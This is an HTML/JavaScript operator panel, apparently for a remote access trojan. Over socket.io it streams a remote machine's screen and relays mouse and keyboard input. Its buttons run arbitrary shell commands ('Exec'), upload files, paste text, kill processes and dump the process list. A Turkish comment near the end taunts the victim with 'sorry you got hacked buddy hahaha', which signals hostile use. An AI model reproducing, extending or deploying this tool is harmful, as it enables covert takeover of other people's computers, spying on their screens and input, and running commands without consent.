<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Admin</title>
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.1.2/socket.io.js"></script>

</head>
<body>
    <script>
      var process = {}
      var pxc = {x:0,y:0}
      var autoq = true;
      var ping = 10000000
      var quality = 1
      var interval = ""
      function startstream(){}
      document.addEventListener("DOMContentLoaded", function() {
const socket = io({
    auth:{auth:prompt("password")
  }
});
const img = {x:document.querySelector("img").width,y:window.innerHeight}
socket.on("connect",function(){
  socket.emit("adminmessage",{
    ready:true,
    resulation:img
  });
})

socket.on("disconnect",function(err){
  console.log("disconnect",err)
})

var mousemove = false;

startstream = function(x,c){
  if(c){
    autoq = false;
    socket.emit("adminmessage",{
    quality:Number(x)
  });
  }else{
clearInterval(interval);
interval = setInterval(()=>{
  if(autoq){
    if(ping > 1000) quality -= 1 
    if(ping < 400) quality += 1 
    if(quality < 0) quality = 1
    if(quality > 100) quality = 100
    socket.emit("adminmessage",{
    quality:quality
  });
  }
  socket.emit("adminmessage",{
    screenshot:true,
    time:Date.now()
  });
},x || 250)
}
}
startstream()

var cvk = 0
setInterval(()=>cvk = 0,1000)

socket.on('adminmessagec', data => {
  if(data.screenshot){
    const blob = new Blob([data.screenshot], { type: 'image/png' });
    const imageUrl = URL.createObjectURL(blob);
    URL.revokeObjectURL(document.getElementById("screenshotImg").src);
    document.getElementById('screenshotImg').src = imageUrl;
    ping = Date.now()-data.time
    cvk++;
    document.getElementById("pingg").innerHTML = "Ping:"+ping+"ms KB:"+String(data.kb)+"/"+String(cvk)
  }
  if(data.process){
    process = data.process
  }
  if(data.height){
    pxc.y = data.height
    pxc.x = data.width
    pxc.resulation = data.resulation
  }

});



document.getElementById('screenshotImg').addEventListener("mouseup",function(event){
  event.preventDefault();
  var type = ""
  if (event.button === 0) type = "left"
  if (event.button === 1) type = "middle"
  if (event.button === 2) type = "right"
  socket.emit("adminmessage",{ mouseup:type})
})
document.getElementById('screenshotImg').addEventListener("contextmenu",function(event){
  event.preventDefault();
})

document.getElementById('screenshotImg').addEventListener("mousedown",function(event){
  event.preventDefault();
  const x = pxc.x*event.clientX/img.x
  const y = pxc.y*event.clientY/img.y
  var type = ""
  if (event.button === 0) type = "left"
  if (event.button === 1) type = "middle"
  if (event.button === 2) type = "right"
  socket.emit("adminmessage",{ mousedown:[x,y,type]})
})
document.getElementById('screenshotImg').addEventListener("wheel", function(event) {
  socket.emit("adminmessage",{ scroll:event.deltaY})
});
document.getElementById('screenshotImg').addEventListener("mousemove",function(event){
  if(mousemove) return;
    socket.emit("adminmessage",{ move:[pxc.x*event.clientX/img.x,pxc.y*event.clientY/img.y]})
})


window.addEventListener("keydown", function(event) {
  if(document.activeElement == document.getElementById("linkinput")) return;
  event.preventDefault();
if(event.shiftKey && event.key == "F1") document.querySelector("#menub").style.display="none"
if(event.shiftKey && event.key == "F2") document.documentElement.requestFullscreen();
if(event.shiftKey && event.key == "Escape") {
  socket.emit("adminmessage",{ keydown:"alt"})
  socket.emit("adminmessage",{ keypress:"tab"})
  socket.emit("adminmessage",{ keyup:"alt"})
}
  var x = event.key.length > 1 ? event.key.replace("arrow","").replace(/^./, event.key[0].toLowerCase() ) : event.key 
  if(x.endsWith("Lock")) x = x.split("Lock").join("lock");
  socket.emit("adminmessage",{ keydown:x})
})
window.addEventListener("keyup", function(event) {
  if(document.activeElement == document.getElementById("linkinput")) return;
  event.preventDefault();
  var x = event.key.length > 1 ? event.key.replace("arrow","").replace(/^./, event.key[0].toLowerCase() ) : event.key
  if(x.endsWith("Lock")) x = x.split("Lock").join("lock");
  socket.emit("adminmessage",{ keyup:x})
})

var filename = ""

document.getElementById('fileInput').addEventListener("change",function(event){
  var fileInput = event.target
  var file = fileInput.files[0];
  if (file) { socket.emit("adminmessage",{ file:[filename,file]})}
})

document.getElementById('execa').addEventListener("click",function(event){
  const userInput = prompt("Exec:");
if (userInput !== null) {
 socket.emit("adminmessage",{ exec:userInput})
}})

document.getElementById('writetexta').addEventListener("click",function(event){
  const userInput = prompt("Paste text:");
if (userInput !== null) {
 socket.emit("adminmessage",{ writetext:userInput})
}})

document.getElementById('filea').addEventListener("click",function(event){
  const userInput = prompt("Filename:");
if (userInput !== null) {
  filename = userInput
  document.getElementById('fileInput').click()
}})

document.getElementById('killa').addEventListener("click",function(event){socket.emit("adminmessage",{ kill:true})})
document.getElementById('movemousea').addEventListener("click",function(event){mousemove = !mousemove})

});



    </script>
  
  <img id="screenshotImg" style="">

  <button onclick="menu()" id="menub" hidden>Toggle Menu </button>



<div class="container" style="display: none;">
 

 <div class="buttons" style="z-index: 100;">
  <button class="ustbutton" id="execa">Exec</button>
  <button class="ustbutton" id="filea" >File</button>
  <button class="ustbutton" id="killa" >Kill</button>
  <button class="ustbutton" id="writetexta" >Write text</button>
  <button class="ustbutton"  id="movemousea" >Movemouse</button>
  <button class="ustbutton"  onclick="navigator.clipboard.writeText(JSON.stringify(process,null,2))" >Copy process</button>
  <button class="ustbutton"  onclick="startstream(prompt('FPS:'))" >Restream</button>
  <button class="ustbutton"  onclick="startstream(prompt('0 to 100:'),'q')" >Quality</button>

</div>
<br>

<input type="file" name="file" id="fileInput" hidden/>
<a class="pingtxt" id="pingg" >Ping</a>
</div>

  
<script>
  var isZero = true;
  function menu(params) {
    if(isZero != true) { 
     document.querySelector(".container").style.display="none"
      isZero = true
    } else{
      document.querySelector(".container").style.display="inline"
      isZero = false
    }
  }//Üzgünüm hacklendin dostum hahaha
</script>

  <style>




    #menub{
      
    user-select: none;
      position: fixed;
      display: inline-block;
      width: 75px;
      height: 50px;
      background-color: indigo;
      color: white;
      padding: 0.5rem;
      font-family: sans-serif;
      border-radius: 10%;
      cursor: pointer;
      margin-left: .2rem;
      border: none;
     transition: ease-in-out .1s;
    }

body {
margin: 0;
  overflow: hidden;
  user-select: none;

  }
  img {
    user-select: none;
    border: none;
    position: absolute; z-index: -1;
    height: 100vh;
    width: 100vw;
  }
    .ustbutton{
      float: left;
      margin-right: 10px;
      border-radius: 10%;
      width: 100px;
      height: 25px;
      border: 0;
      box-shadow: 5px 4px 10px black;
      transition: ease-in-out .1s;
    }
        .pingtxt{
          float: right;
      color: red;
    }

    .buttons{
      margin-left: 10vw;
      display: inline-block;
      padding-left: 0;
      padding-bottom: 1rem;
    }

    .ustbutton:hover{
     width: 120px;
     height: 40px;
     font-size: 110%;
     background-color: rgb(160, 158, 158);
    }

    .uploadtext{
      width: 75px;
      height: 50px;
      background-color: indigo;
      color: white;
      padding: 0.5rem;
      font-family: sans-serif;
      border-radius: 10%;
      cursor: pointer;
      margin-left: .2rem;
     transition: ease-in-out .1s;
    }

    .uploadtext:hover{
      font-size: 110%;
      background-color: rgb(51, 4, 85);
    }

  </style>
</body>
</html>
